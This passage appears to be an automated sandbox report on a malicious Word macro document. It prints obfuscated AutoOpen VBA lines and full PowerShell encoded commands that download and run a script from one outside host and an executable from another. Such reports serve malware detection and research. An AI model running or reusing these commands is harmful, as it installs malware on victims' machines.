AdABpAG8AbgAuAFMAaABlAGwAbABFAHgAZQBjAHUAdABlACgAJABwAGEAdABoACwAJABuAHUAbAAsACAAJABuAHUAbAAsACAAJABuAHUAbAAsADAAKQANAAoADQAKACAAIAAgACAAIAB9AGMAYQB0AGMAaAB7AH0ADQAKACAAIAAgACAAIAANAAoAIAAgAH0ADQAKAH0ADQAKAA0ACgBFAHgAaQB0ADsADQAKAA0ACgA=Jump to behavior

      System Summary:

      barindex
      Malicious sample detected (through community Yara rule)Show sources
      Source: attacker1.doc, type: SAMPLEMatched rule: Detects powershell keyword obfuscated with carets Author: Florian Roth
      Source: 00000002.00000002.408319422.000000000029F000.00000004.00000020.sdmp, type: MEMORYMatched rule: Detects powershell keyword obfuscated with carets Author: Florian Roth
      Source: 00000002.00000002.408387052.00000000004A4000.00000004.00000040.sdmp, type: MEMORYMatched rule: Detects powershell keyword obfuscated with carets Author: Florian Roth
      Source: 00000002.00000002.408293787.0000000000260000.00000004.00000020.sdmp, type: MEMORYMatched rule: Detects powershell keyword obfuscated with carets Author: Florian Roth
      Source: Process Memory Space: cmd.exe PID: 668, type: MEMORYSTRMatched rule: Detects powershell keyword obfuscated with carets Author: Florian Roth
      Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
      Source: Document image extraction number: 0Screenshot OCR: Enable editing" button on the top bar, and then click "Enable content".
      Source: Document image extraction number: 0Screenshot OCR: Enable content".
      Source: Document image extraction number: 1Screenshot OCR: Enable editing" button on the top bar, and then click "Enable content".
      Source: Document image extraction number: 1Screenshot OCR: Enable content".
      Document contains an embedded VBA macro which may execute processesShow sources
      Source: ~DF527BC4B1A394C70E.TMP.0.drOLE, VBA macro line: JbxHook_Shell_2_ = Shell(jbxparam0, jbxparam1)
      Very long command line foundShow sources
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: Commandline size = 2653
      Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 2620
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: Commandline size = 2653Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 2620Jump to behavior
      Document contains an embedded VBA macro with suspicious stringsShow sources
      Source: attacker1.docOLE, VBA macro line: VBA.Shell# "CmD /C " + Trim(rjvFRbqzLtkzn) + SKKdjMpgJRQRK + Trim(Replace(pNHbvwXpnbZvS.AlternativeText + "", "[", "A")) + hdNxDVBxCTqQTpB + RJzJQGRzrc + CWflqnrJbKVBj, CInt(351 * 2 + -702)
      Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function AutoOpen, String shell#: VBA.Shell# "CmD /C " + Trim(rjvFRbqzLtkzn) + SKKdjMpgJRQRK + Trim(Replace(pNHbvwXpnbZvS.AlternativeText + "", "[", "A")) + hdNxDVBxCTqQTpB + RJzJQGRzrc + CWflqnrJbKVBj, CInt(351 * 2 + - 702)Name: AutoOpen
      Source: attacker1.doc, type: SAMPLEMatched rule: SUSP_PowerShell_Caret_Obfuscation_2 date = 2019-07-20, author = Florian Roth, description = Detects powershell keyword obfuscated with carets, reference = Internal Research
      Source: attacker1.doc, type: SAMPLEMatched rule: Office_AutoOpen_Macro date = 2015-05-28, hash5 = 7c06cab49b9332962625b16f15708345, hash4 = a3035716fe9173703941876c2bde9d98, hash3 = 66e67c2d84af85a569a04042141164e6, hash2 = 63f6b20cb39630b13c14823874bd3743, author = Florian Roth, description = Detects an Microsoft Office file that contains the AutoOpen Macro function, hash7 = 25285b8fe2c41bd54079c92c1b761381, hash6 = bfc30332b7b91572bfe712b656ea8a0c, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 4d00695d5011427efc33c9722c61ced2
      Source: 00000002.00000002.408319422.000000000029F000.00000004.00000020.sdmp, type: MEMORYMatched rule: SUSP_PowerShell_Caret_Obfuscation_2 date = 2019-07-20, author = Florian Roth, description = Detects powershell keyword obfuscated with carets, reference = Internal Research
      Source: 00000002.00000002.408387052.00000000004A4000.00000004.00000040.sdmp, type: MEMORYMatched rule: SUSP_PowerShell_Caret_Obfuscation_2 date = 2019-07-20, author = Florian Roth, description = Detects powershell keyword obfuscated with carets, reference = Internal Research
      Source: 00000002.00000002.408293787.0000000000260000.00000004.00000020.sdmp, type: MEMORYMatched rule: SUSP_PowerShell_Caret_Obfuscation_2 date = 2019-07-20, author = Florian Roth, description = Detects powershell keyword obfuscated with carets, reference = Internal Research
      Source: Process Memory Space: cmd.exe PID: 668, type: MEMORYSTRMatched rule: SUSP_PowerShell_Caret_Obfuscation_2 date = 2019-07-20, author = Florian Roth, description = Detects powershell keyword obfuscated with carets, reference = Internal Research
      Source: C:\Users\user\AppData\Local\Temp\~DF527BC4B1A394C70E.TMP, type: DROPPEDMatched rule: SUSP_VBA_FileSystem_Access date = 2019-06-21, author = Florian Roth, description = Detects suspicious VBA that writes to disk and is activated on document open, reference = Internal Research, score = 52262bb315fa55b7441a04966e176b0e26b7071376797e35c80aa60696b6d6fc
      Source: ~WRF{DF4B264E-30B7-41FF-92E6-96F7D248F773}.tmp.0.drOLE indicator application name: unknown
      Source: ~DF527BC4B1A394C70E.TMP.0.drOLE indicator application name: unknown
      Source: attacker1.docOLE, VBA macro line: Sub AutoOpen()
      Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function AutoOpenName: AutoOpen
      Source: ~DF527BC4B1A394C70E.TMP.0.drOLE, VBA macro line: Sub AutoOpen()
      Source: ~WRF{DF4B264E-30B7-41FF-92E6-96F7D248F773}.tmp.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
      Source: ~DF527BC4B1A394C70E.TMP.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
      Source: ~WRF{DF4B264E-30B7-41FF-92E6-96F7D248F773}.tmp.0.drOLE indicator has summary info: false
      Source: ~DF527BC4B1A394C70E.TMP.0.drOLE indicator has summary info: false
      Source: attacker1.docOLE indicator, VBA macros: true
      Source: ~DF527BC4B1A394C70E.TMP.0.drOLE indicator, VBA macros: true
      Source: attacker1.docVirustotal: Detection: 57%
      Source: attacker1.docReversingLabs: Detection: 53%
      Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\cmd.exe CmD /C P^O^W^E^R^S^H^E^L^L ^-^N^o^P^r^o^f^i^l^e^ -^E^x^e^cutionPolicy B^^^yp^ass -encodedcommand JABpAG4AcwB0AGEAbgBjAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEEAYwB0AGkAdgBhAHQAbwByAF0AOgA6AEMAcgBlAGEAdABlAEkAbgBzAHQAYQBuAGMAZQAoACIAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACIAKQA7AA0ACgAkAG0AZQB0AGgAbwBkACAAPQAgAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0AF0ALgBHAGUAdABNAGUAdABoAG8AZABzACgAKQA7AA0ACgBmAG8AcgBlAGEAYwBoACgAJABtACAAaQBuACAAJABtAGUAdABoAG8AZAApAHsADQAKAA0ACgAgACAAaQBmACgAJABtAC4ATgBhAG0AZQAgAC0AZQBxACAAIgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAIgApAHsADQAKACAAIAAgACAAdAByAHkAewANAAoAIAAgACAAIAAgACQAdQByAGkAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4AVQByAGkAKAAiAGgAdAB0AHAAOgAvAC8AMQA3ADYALgAzADIALgAzADUALgAxADYALwA3ADAANABlAC4AcABoAHAAIgApAA0ACgAgACAAIAAgACAASQBFAFgAKAAkAG0ALgBJAG4AdgBvAGsAZQAoACQAaQBuAHMAdABhAG4AYwBlACwAIAAoACQAdQByAGkAKQApACkAOwANAAoAIAAgACAAIAB9AGMAYQB0AGMAaAB7AH0ADQAKAA0ACgAgACAAfQANAAoADQAKACAAIABpAGYAKAAkAG0ALgBOAGEAbQBlACAALQBlAHEAIAAiAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACIAKQB7AA0ACgAgACAAIAAgACAAdAByAHkAewANAAoAIAAgACAAIAAgACQAdQByAGkAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4AVQByAGkAKAAiAGgAdAB0AHAAOgAvAC8AZgBwAGUAdAByAGEAYQByAGQAZQBsAGwAYQAuAGIAYQBuAGQALwB4AGEAcABfADEAMAAyAGIALQBBAFoAMQAvADcAMAA0AGUALgBwAGgAcAA/AGwAPQBsAGkAdAB0AGUAbgA0AC4AZwBhAHMAIgApAA0ACgAgACAAIAAgACAAJAByAGUAcwBwAG8AbgBzAGUAIAA9ACAAJABtAC4ASQBuAHYAbwBrAGUAKAAkAGkAbgBzAHQAYQBuAGMAZQAsACAAKAAkAHUAcgBpACkAKQA7AA0ACgANAAoAIAAgACAAIAAgACQAcABhAHQAaAAgAD0AIABbAFMAeQBzAHQAZQBtAC4ARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AEcAZQB0AEYAbwBsAGQAZQByAFAAYQB0AGgAKAAiAEMAbwBtAG0AbwBuAEEAcABwAGwAaQBjAGEAdABpAG8AbgBEAGEAdABhACIAKQAgACsAIAAiAFwAXABRAGQAWgBHAFAALgBlAHgAZQAiADsADQAKACAAIAAgACAAIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4ARgBpAGwAZQBdADoAOgBXAHIAaQB0AGUAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoACwAIAAkAHIAZQBzAHAAbwBuAHMAZQApADsADQAKAA0ACgAgACAAIAAgACAAJABjAGwAcwBpAGQAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAEcAdQBpAGQAIAAnAEMAMAA4AEEARgBEADkAMAAtAEYAMgBBADEALQAxADEARAAxAC0AOAA0ADUANQAtADAAMABBADAAQwA5ADEARgAzADgAOAAwACcADQAKACAAIAAgACAAIAAkAHQAeQBwAGUAIAA9ACAAWwBUAHkAcABlAF0AOgA6AEcAZQB0AFQAeQBwAGUARgByAG8AbQBDAEwAUwBJAEQAKAAkAGMAbABzAGkAZAApAA0ACgAgACAAIAAgACAAJABvAGIAagBlAGMAdAAgAD0AIABbAEEAYwB0AGkAdgBhAHQAbwByAF0AOgA6AEMAcgBlAGEAdABlAEkAbgBzAHQAYQBuAGMAZQAoACQAdAB5AHAAZQApAA0ACgAgACAAIAAgACAAJABvAGIAagBlAGMAdAAuAEQAbwBjAHUAbQBlAG4AdAAuAEEAcABwAGwAaQBjAGEAdABpAG8AbgAuAFMAaABlAGwAbABFAHgAZQBjAHUAdABlACgAJABwAGEAdABoACwAJABuAHUAbAAsACAAJABuAHUAbAAsACAAJABuAHUAbAAsADAAKQANAAoADQAKACAAIAAgACAAIAB9AGMAYQB0AGMAaAB7AH0ADQAKACAAIAAgACAAIAANAAoAIAAgAH0ADQAKAH0ADQAKAA0ACgBFAHgAaQB0ADsADQAKAA0ACgA=
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POWERSHELL -NoProfile -ExecutionPolicy B^ypass -encodedcommand JABpAG4AcwB0AGEAbgBjAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEEAYwB0AGkAdgBhAHQAbwByAF0AOgA6AEMAcgBlAGEAdABlAEkAbgBzAHQAYQBuAGMAZQAoACIAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACIAKQA7AA0ACgAkAG0AZQB0AGgAbwBkACAAPQAgAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0AF0ALgBHAGUAdABNAGUAdABoAG8AZABzACgAKQA7AA0ACgBmAG8AcgBlAGEAYwBoACgAJABtACAAaQBuACAAJABtAGUAdABoAG8AZAApAHsADQAKAA0ACgAgACAAaQBmACgAJABtAC4ATgBhAG0AZQAgAC0AZQBxACAAIgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAIgApAHsADQAKACAAIAAgACAAdAByAHkAewANAAoAIAAgACAAIAAgACQAdQByAGkAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4AVQByAGkAKAAiAGgAdAB0AHAAOgAvAC8AMQA3ADYALgAzADIALgAzADUALgAxADYALwA3ADAANABlAC4AcABoAHAAIgApAA0ACgAgACAAIAAgACAASQBFAFgAKAAkAG0ALgBJAG4AdgBvAGsAZQAoACQAaQBuAHMAdABhAG4AYwBlACwAIAAoACQAdQByAGkAKQApACkAOwANAAoAIAAgACAAIAB9AGMAYQB0AGMAaAB7AH0ADQAKAA0ACgAgACAAfQANAAoADQAKACAAIABpAGYAKAAkAG0ALgBOAGEAbQBlACAALQBlAHEAIAAiAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACIAKQB7AA0ACgAgACAAIAAgACAAdAByAHkAewANAAoAIAAgACAAIAAgACQAdQByAGkAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4AVQByAGkAKAAiAGgAdAB0AHAAOgAvAC8AZgBwAGUAdAByAGEAYQByAGQAZQBsAGwAYQAuAGIAYQBuAGQALwB4AGEAcABfADEAMAAyAGIALQBBAFoAMQAvADcAMAA0AGUALgBwAGgAcAA/AGwAPQBsAGkAdAB0AGUAbgA0AC4AZwBhAHMAIgApAA0ACgAgACAAIAAgACAAJAByAGUAcwBwAG8AbgBzAGUAIAA9ACAAJABtAC4ASQBuAHYAbwBrAGUAKAAkAGkAbgBzAHQAYQBuAGMAZQAsACAAKAAkAHUAcgBpACkAKQA7AA0ACgANAAoAIAAgACAAIAAgACQAcABhAHQAaAAgAD0AIABbAFMAeQBzAHQAZQBtAC4ARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AEcAZQB0AEYAbwBsAGQAZQByAFAAYQB0AGgAKAAiAEMAbwBtAG0AbwBuAEEAcABwAGwAaQBjAGEAdABpAG8AbgBEAGEAdABhACIAKQAgACsAIAAiAFwAXABRAGQAWgBHAFAALgBlAHgAZQAiADsADQAKACAAIAAgACAAIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4ARgBpAGwAZQBdADoAOgBXAHIAaQB0AGUAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoACwAIAAkAHIAZQBzAHAAbwBuAHMAZQApADsADQAKAA0ACgAgACAAIAAgACAAJABjAGwAcwBpAGQAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAEcAdQBpAGQAIAAnAEMAMAA4AEEARgBEADkAMAAtAEYAMgBBADEALQAxADEARAAxAC0AOAA0ADUANQAtADAAMABBADAAQwA5ADEARgAzADgAOAAwACcADQAKACAAIAAgACAAIAAkAHQAeQBwAGUAIAA9ACAAWwBUAHkAcABlAF0AOgA6AEcAZQB0AFQAeQBwAGUARgByAG8AbQBDAEwAUwBJAEQAKAAkAGMAbABzAGkAZAApAA0ACgAgACAAIAAgACAAJABvAGIAagBlAGMAdAAgAD0AIABbAEEAYwB0AGkAdgBhAHQAbwByAF0AOgA6AEMAcgBlAGEAdABlAEkAbgBzAHQAYQBuAGMAZQAoACQAdAB5AHAAZQApAA0ACgAgACAAIAAgACAAJABvAGIAagBlAGMAdAAuAEQAbwBjAHUAbQBlAG4AdAAuAEEAcABwAGwAaQBjAGEAdABpAG8AbgAuAFMAaABlAGwAbABFAHgAZQBjAHUAdABlACgAJABwAGEAdABoACwAJABuAHUAbAAsACAAJABuAHUAbAAsACAAJABuAHUAbAAsADAAKQANAAoADQAKACAAIAAgACAAIAB9AGMAYQB0AGMAaAB7AH0ADQAKACAAIAAgACAAIAANAAoAIAAgAH0ADQAKAH0ADQAKAA0ACgBFAHgAaQB0ADsADQAKAA0ACgA=
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\cmd.exe CmD /C P^O^W^E^R^S^H^E^L^L ^-^N^o^P^r^o^f^i^l^e^ -^E^x^e^cutionPolicy B^^^yp^ass -encodedcommand JABpAG4AcwB0AGEAbgBjAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEEAYwB0AGkAdgBhAHQAbwByAF0AOgA6AEMAcgBlAGEAdABlAEkAbgBzAHQAYQBuAGMAZQAoACIAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACIAKQA7AA0ACgAkAG0AZQB0AGgAbwBkACAAPQAgAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0AF0ALgBHAGUAdABNAGUAdABoAG8AZABzACgAKQA7AA0ACgBmAG8AcgBlAGEAYwBoACgAJABtACAAaQBuACAAJABtAGUAdABoAG8AZAApAHsADQAKAA0ACgAgACAAaQBmACgAJABtAC4ATgBhAG0AZQAgAC0AZQBxACAAIgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAIgApAHsADQAKACAAIAAgACAAdAByAHkAewANAAoAIAAgACAAIAAgACQAdQByAGkAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4AVQByAGkAKAAiAGgAdAB0AHAAOgAvAC8AMQA3ADYALgAzADIALgAzADUALgAxADYALwA3ADAANABlAC4AcABoAHAAIgApAA0ACgAgACAAIAAgACAASQBFAFgAKAAkAG0ALgBJAG4AdgBvAGsAZQAoACQAaQBuAHMAdABhAG4AYwBlACwAIAAoACQAdQByAGkAKQApACkAOwANAAoAIAAgACAAIAB9AGMAYQB0AGMAaAB7AH0ADQAKAA0ACgAgACAAfQANAAoADQAKACAAIABpAGYAKAAkAG0ALgBOAGEAbQBlACAALQBlAHEAIAAiAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACIAKQB7AA0ACgAgACAAIAAgACAAdAByAHkAewANAAoAIAAgACAAIAAgACQAdQByAGkAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4AVQByAGkAKAAiAGgAdAB0AHAAOgAvAC8AZgBwAGUAdAByAGEAYQByAGQAZQBsAGwAYQAuAGIAYQBuAGQALwB4AGEAcABfADEAMAAyAGIALQBBAFoAMQAvADcAMAA0AGUALgBwAGgAcAA/AGwAPQBsAGkAdAB0AGUAbgA0AC4AZwBhAHMAIgApAA0ACgAgACAAIAAgACAAJAByAGUAcwBwAG8AbgBzAGUAIAA9ACAAJABtAC4ASQBuAHYAbwBrAGUAKAAkAGkAbgBzAHQAYQBuAGMAZQAsACAAKAAkAHUAcgBpACkAKQA7AA0ACgANAAoAIAAgACAAIAAgACQAcABhAHQAaAAgAD0AIABbAFMAeQBzAHQAZQBtAC4ARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AEcAZQB0AEYAbwBsAGQAZQByAFAAYQB0AGgAKAAiAEMAbwBtAG0AbwBuAEEAcABwAGwAaQBjAGEAdABpAG8AbgBEAGEAdABhACIAKQAgACsAIAAiAFwAXABRAGQAWgBHAFAALgBlAHgAZQAiADsADQAKACAAIAAgACAAIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4ARgBpAGwAZQBdADoAOgBXAHIAaQB0AGUAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoACwAIAAkAHIAZQBzAHAAbwBuAHMAZQApADsADQAKAA0ACgAgACAAIAAgACAAJABjAGwAcwBpAGQAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAEcAdQBpAGQAIAAnAEMAMAA4AEEARgBEADkAMAAtAEYAMgBBADEALQAxADEARAAxAC0AOAA0ADUANQAtADAAMABBADAAQwA5ADEARgAzADgAOAAwACcADQAKACAAIAAgACAAIAAkAHQAeQBwAGUAIAA9ACAAWwBUAHkAcABlAF0AOgA6AEcAZQB0AFQAeQBwAGUARgByAG8AbQBDAEwAUwBJAEQAKAAkAGMAbABzAGkAZAApAA0ACgAgACAAIAAgACAAJABvAGIAagBlAGMAdAAgAD0AIABbAEEAYwB0AGkAdgBhAHQAbwByAF0AOgA6AEMAcgBlAGEAdABlAEkAbgBzAHQAYQBuAGMAZQAoACQAdAB5AHAAZQApAA0ACgAgACAAIAAgACAAJABvAGIAagBlAGMAdAAuAEQAbwBjAHUAbQBlAG4AdAAuAEEAcABwAGwAaQBjAGEAdABpAG8AbgAuAFMAaABlAGwAbABFAHgAZQBjAHUAdABlACgAJABwAGEAdABoACwAJABuAHUAbAAsACAAJABuAHUAbAAsACAAJABuAHUAbAAsADAAKQANAAoADQAKACAAIAAgACAAIAB9AGMAYQB0AGMAaAB7AH0ADQAKACAAIAAgACAAIAANAAoAIAAgAH0ADQAKAH0ADQAKAA0ACgBFAHgAaQB0ADsADQAKAA0ACgA=Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POWERSHELL -NoProfile -ExecutionPolicy B^ypass -encodedcommand JABpAG4AcwB0AGEAbgBjAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEEAYwB0AGkAdgBhAHQAbwByAF0AOgA6AEMAcgBlAGEAdABlAEkAbgBzAHQAYQBuAGMAZQAoACIAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACIAKQA7AA0ACgAkAG0AZQB0AGgAbwBkACAAPQAgAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0AF0ALgBHAGUAdABNAGUAdABoAG8AZABzACgAKQA7AA0ACgBmAG8AcgBlAGEAYwBoACgAJABtACAAaQBuACAAJABtAGUAdABoAG8AZAApAHsADQAKAA0ACgAgACAAaQBmACgAJABtAC4ATgBhAG0AZQAgAC0AZQBxACAAIgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAIgApAHsADQAKACAAIAAgACAAdAByAHkAewANAAoAIAAgACAAIAAgACQAdQByAGkAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4AVQByAGkAKAAiAGgAdAB0AHAAOgAvAC8AMQA3ADYALgAzADIALgAzADUALgAxADYALwA3ADAANABlAC4AcABoAHAAIgApAA0ACgAgACAAIAAgACAASQBFAFgAKAAkAG0ALgBJAG4AdgBvAGsAZQAoACQAaQBuAHMAdABhAG4AYwBlACwAIAAoACQAdQByAGkAKQApACkAOwANAAoAIAAgACAAIAB9AGMAYQB0AGMAaAB7AH0ADQAKAA0ACgAgACAAfQANAAoADQAKACAAIABpAGYAKAAkAG0ALgBOAGEAbQBlACAALQBlAHEAIAAiAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACIAKQB7AA0ACgAgACAAIAAgACAAdAByAHkAewANAAoAIAAgACAAIAAgACQAdQByAGkAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4AVQByAGkAKAAiAGgAdAB0AHAAOgAvAC8AZgBwAGUAdAByAGEAYQByAGQAZQBsAGwAYQAuAGIAYQBuAGQALwB4AGEAcABfADEAMAAyAGIALQBBAFoAMQAvADcAMAA0AGUALgBwAGgAcAA/AGwAPQBsAGkAdAB0AGUAbgA0AC4AZwBhAHMAIgApAA0ACgAgACAAIAAgACAAJAByAGUAcwBwAG8AbgBzAGUAIAA9ACAAJABtAC4ASQBuAHYAbwBrAGUAKAAkAGkAbgBzAHQAYQBuAGMAZQAsACAAKAAkAHUAcgBpACkAKQA7AA0ACgANAAoAIAAgACAAIAAgACQAcABhAHQAaAAgAD0AIABbAFMAeQBzAHQAZQBtAC4ARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AEcAZQB0AEYAbwBsAGQAZQByAFAAYQB0AGgAKAAiAEMAbwBtAG0AbwBuAEEAcABwAGwAaQBjAGEAdABpAG8AbgBEAGEAdABhACIAKQAgACsAIAAiAFwAXABRAGQAWgBHAFAALgBlAHgAZQAiADsADQAKACAAIAAgACAAIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4ARgBpAGwAZQBdADoAOgBXAHIAaQB0AGUAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoACwAIAAkAHIAZQBzAHAAbwBuAHMAZQApADsADQAKAA0ACgAgACAAIAAgACAAJABjAGwAcwBpAGQAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAEcAdQBpAGQAIAAnAEMAMAA4AEEARgBEADkAMAAtAEYAMgBBADEALQAxADEARAAxAC0AOAA0ADUANQAtADAAMABBADAAQwA5ADEARgAzADgAOAAwACcADQAKACAAIAAgACAAIAAkAHQAeQBwAGUAIAA9ACAAWwBUAHkAcABlAF0AOgA6AEcAZQB0AFQAeQBwAGUARgByAG8AbQBDAEwAUwBJAEQAKAAkAGMAbABzAGkAZAApAA0ACgAgACAAIAAgACAAJABvAGIAagBlAGMAdAAgAD0AIABbAEEAYwB0AGkAdgBhAHQAbwByAF0AOgA6AEMAcgBlAGEAdABlAEkAbgBzAHQAYQBuAGMAZQAoACQAdAB5AHAAZQApAA0ACgAgACAAIAAgACAAJABvAGIAagBlAGMAdAAuAEQAbwBjAHUAbQBlAG4AdAAuAEEAcABwAGwAaQBjAGEAdABpAG8AbgAuAFMAaABlAGwAbABFAHgAZQBjAHUAdABlACgAJABwAGEAdABoACwAJABuAHUAbAAsACAAJABuAHUAbAAsACAAJABuAHUAbAAsADAAKQANAAoADQAKACAAIAAgACAAIAB9AGMAYQB0AGMAaAB7AH0ADQAKACAAIAAgACAAIAANAAoAIAAgAH0ADQAKAH0ADQAKAA0ACgBFAHgAaQB0ADsADQAKAA0ACgA=Jump to behavior
      Source: attacker1.docOLE indicator, Word Document stream: true
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$tacker1.docJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRC59F.tmpJump to behavior
      Source: classification engineClassification label: mal100.bank.expl.evad.winDOC@5/16@1/1
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
      Source: ~WRF{DF4B264E-30B7-41FF-92E6-96F7D248F773}.tmp.0.drOLE document summary: title field not present or empty
      Source: ~WRF{DF4B264E-30B7-41FF-92E6-96F7D248F773}.tmp.0.drOLE document summary: author field not present or empty
      Source: ~WRF{DF4B264E-30B7-41FF-92E6-96F7D248F773}.tmp.0.drOLE document summary: edited time not present or 0
      Source: ~DF527BC4B1A394C70E.TMP.0.drOLE document summary: title field not present or empty
      Source: ~DF527BC4B1A394C70E.TMP.0.drOLE document summary: author field not present or empty
      Source: ~DF527BC4B1A394C70E.TMP.0.drOLE document summary: edited time not present or 0
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dllJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
      Source: attacker1.docInitial sample: OLE summary comments = Re-contextualized radical service-desk
      Source: Binary string: :\Windows\System.pdb source: powershell.exe, 00000004.00000002.403660954.0000000002BE7000.00000004.00000040.sdmp
      Source: Binary string: C:\Windows\mscorlib.pdb source: powershell.exe, 00000004.00000002.403660954.0000000002BE7000.00000004.00000040.sdmp
      Source: Binary string: :\Windows\dll\System.pdb source: powershell.exe, 00000004.00000002.403660954.0000000002BE7000.00000004.00000040.sdmp
      Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdb=C:\ source: powershell.exe, 00000004.00000002.403660954.0000000002BE7000.00000004.00000040.sdmp
      Source: Binary string: ws\System.pdbpdbtem.pdbb) source: powershell.exe, 00000004.00000002.403657239.0000000002BE4000.00000004.00000040.sdmp
      Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbamDa source: powershell.exe, 00000004.00000002.403660954.0000000002BE7000.00000004.00000040.sdmp
      Source: Binary string: >ystem.pdb source: powershell.exe, 00000004.00000002.403660954.0000000002BE7000.00000004.00000040.sdmp
